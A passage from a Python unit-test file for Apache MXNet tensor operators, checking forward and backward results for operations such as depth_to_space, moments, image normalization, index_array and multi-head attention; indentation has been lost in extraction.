# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
